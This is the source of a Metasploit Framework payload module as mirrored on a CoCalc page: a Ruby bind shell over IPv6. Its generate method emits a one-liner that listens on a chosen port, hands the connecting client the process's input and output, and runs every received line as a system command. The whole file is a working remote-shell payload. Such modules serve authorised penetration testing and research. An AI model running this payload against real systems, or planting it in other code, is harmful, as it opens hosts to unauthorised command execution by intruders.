Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb
19567 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
module MetasploitModule
7
CachedSize = 524
8
9
include Msf::Payload::Single
10
include Msf::Payload::Ruby
11
include Msf::Sessions::CommandShellOptions
12
13
def initialize(info = {})
14
super(
15
merge_info(
16
info,
17
'Name' => 'Ruby Command Shell, Bind TCP IPv6',
18
'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
19
'Author' => [ 'kris katterjohn', 'hdm' ],
20
'License' => MSF_LICENSE,
21
'Platform' => 'ruby',
22
'Arch' => ARCH_RUBY,
23
'Handler' => Msf::Handler::BindTcp,
24
'Session' => Msf::Sessions::CommandShell,
25
'PayloadType' => 'ruby',
26
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
27
)
28
)
29
end
30
31
def generate(_opts = {})
32
return prepends(ruby_string)
33
end
34
35
def ruby_string
36
"require 'socket';s=TCPServer.new(\"::\",#{datastore['LPORT'].to_i});c=s.accept;s.close;" \
37
'$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;' \
38
'(IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }'
39
end
40
end
41
42